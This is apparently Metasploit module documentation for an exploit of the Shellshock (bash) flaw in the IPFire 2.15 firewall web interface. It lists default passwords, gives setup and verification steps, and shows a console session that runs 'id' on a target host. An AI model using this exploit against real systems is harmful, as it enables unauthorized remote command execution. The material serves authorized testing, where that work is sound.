48 lines
1.3 KiB
Markdown
48 lines
1.3 KiB
Markdown
|
The following is the recommended format for module documentation.
|
||
|
|
But feel free to add more content/sections to this.
|
||
|
|
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
|
||
|
|
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
Example steps in this format:
|
||
|
|
|
||
|
|
1. Install the firewall
|
||
|
|
2. Start msfconsole
|
||
|
|
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
|
||
|
|
4. Do: ```set rhost 10.10.10.10```
|
||
|
|
5. Do: ```set CMD ls```
|
||
|
|
6. Do: ```run```
|
||
|
|
7. You should see the output of the command that was run.
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**PASSWORD**
|
||
|
|
|
||
|
|
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||
|
|
|
||
|
|
**CMD**
|
||
|
|
|
||
|
|
This is the command to run on the system.
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
Example of running the ID command
|
||
|
|
```
|
||
|
|
msf > use exploit/linux/http/ipfire_bashbug_exec
|
||
|
|
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
|
||
|
|
PASSWORD => admin
|
||
|
|
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
|
||
|
|
rhost => 192.168.2.202
|
||
|
|
msf exploit(ipfire_bashbug_exec) > set CMD id
|
||
|
|
CMD => id
|
||
|
|
msf exploit(ipfire_bashbug_exec) > exploit
|
||
|
|
|
||
|
|
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
|
||
|
|
[*] Exploit completed, but no session was created.
|
||
|
|
```
|